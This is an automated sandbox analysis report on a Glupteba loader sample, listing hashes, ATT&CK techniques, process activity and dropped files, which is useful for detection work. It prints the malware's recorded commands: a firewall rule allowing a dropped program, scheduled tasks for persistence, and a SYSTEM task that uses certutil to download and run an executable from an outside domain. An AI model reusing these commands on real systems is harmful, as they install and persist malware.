glupteba | 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f

Analysis

max time kernel
31s
max time network
160s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
Size

3.8MB
MD5

79b40e7d866110b9624906e63bf87456
SHA1

be098dd1ca4465bf415423f5887508e2198fb078
SHA256

60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f
SHA512

366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1948-56-0x0000000005500000-0x0000000005BF6000-memory.dmp	family_glupteba
behavioral1/memory/1948-57-0x0000000000400000-0x00000000036BB000-memory.dmp	family_glupteba

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

524 bcdedit.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220524233513.cab makecab.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1776 schtasks.exe
756 schtasks.exe

pid	process
524	bcdedit.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220524233513.cab	makecab.exe

pid	process
1776	schtasks.exe
756	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe

pid	process
1948	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
1436	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe

description	pid	process
Token: SeDebugPrivilege	1948	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
Token: SeImpersonatePrivilege	1948	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.execmd.exe

description	pid	process	target process
PID 1436 wrote to memory of 1804	1436	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe	cmd.exe
PID 1436 wrote to memory of 1804	1436	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe	cmd.exe
PID 1436 wrote to memory of 1804	1436	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe	cmd.exe
PID 1436 wrote to memory of 1804	1436	60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe	cmd.exe
PID 1804 wrote to memory of 1688	1804	cmd.exe	netsh.exe
PID 1804 wrote to memory of 1688	1804	cmd.exe	netsh.exe
PID 1804 wrote to memory of 1688	1804	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
"C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
"C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:392

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1776

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:756

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:1140

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:524

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524233513.log C:\Windows\Logs\CBS\CbsPersist_20220524233513.cab
1⤵
- Drops file in Windows directory
PID:1992

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
79b40e7d866110b9624906e63bf87456

SHA1
be098dd1ca4465bf415423f5887508e2198fb078

SHA256
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f

SHA512
366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
4.4MB

MD5
1d473b4ac9be66cc80241ea3593eac3e

SHA1
42d0813b0455af4b3e4688f7e8622edc0546f0a1

SHA256
62a5f155a915ab6798502b4960f043692f7cb36f28e1632092b8645e8fe09521

SHA512
78880f444870c7b46d3674b4e28236c9214f2d7299bab5866d55c4f7f39675d0c536b56dd152c3f19592c3dfbb4f9d0d7deabc77ff39087ba68928138ae6260a

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
3.4MB

MD5
85d6302f1f8a4902c590ee6e98024589

SHA1
8ac4c827bbedfe7e18526541340fb3e48f7c8ac7

SHA256
5213efbb7ebc3e633f47ec2417589208c80ebd8640a9ae6ca221e9eac20a3938

SHA512
80d6f4c50cfd284e7e7a12391993dde24eeb743ad20a963704d0250279eae1b13031c35b0071d99f62ebde64e3515729128cc0521329145dfa48663f234c1d4f

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
3.9MB

MD5
2a207fb2d91453155836e328ee8189b5

SHA1
3f64e1568c8f21d2f500d2c82c4da2cfb41cb165

SHA256
288d4c5a8b49e3171848e36e00e79e5aaee4b7bbf1a4b90298e74355e77aee78

SHA512
a3b7e2fb14111182e9564cd51e8f8232aa175d93fd88c83a693138b7dde98a41a9014712deb13f12f671e77108ca18aab852a927efb4cef264ee1e559dec90a9

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
79b40e7d866110b9624906e63bf87456

SHA1
be098dd1ca4465bf415423f5887508e2198fb078

SHA256
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f

SHA512
366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a

Download Submit
\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
79b40e7d866110b9624906e63bf87456

SHA1
be098dd1ca4465bf415423f5887508e2198fb078

SHA256
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f

SHA512
366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a

Download Submit
memory/392-68-0x0000000004EE0000-0x0000000005287000-memory.dmp

Filesize
3.7MB

Download
memory/392-64-0x0000000000000000-mapping.dmp

Download
memory/392-71-0x0000000004EE0000-0x0000000005287000-memory.dmp

Filesize
3.7MB

Download
memory/392-72-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/524-84-0x0000000000000000-mapping.dmp

Download
memory/1436-58-0x0000000004F10000-0x00000000052B7000-memory.dmp

Filesize
3.7MB

Download
memory/1436-66-0x0000000004F10000-0x00000000052B7000-memory.dmp

Filesize
3.7MB

Download
memory/1436-67-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/1688-61-0x000007FEFBF21000-0x000007FEFBF23000-memory.dmp

Filesize
8KB

Download
memory/1688-60-0x0000000000000000-mapping.dmp

Download
memory/1804-59-0x0000000000000000-mapping.dmp

Download
memory/1948-54-0x0000000005150000-0x00000000054F7000-memory.dmp

Filesize
3.7MB

Download
memory/1948-57-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/1948-56-0x0000000005500000-0x0000000005BF6000-memory.dmp

Filesize
7.0MB

Download
memory/1948-55-0x0000000005150000-0x00000000054F7000-memory.dmp

Filesize
3.7MB

Download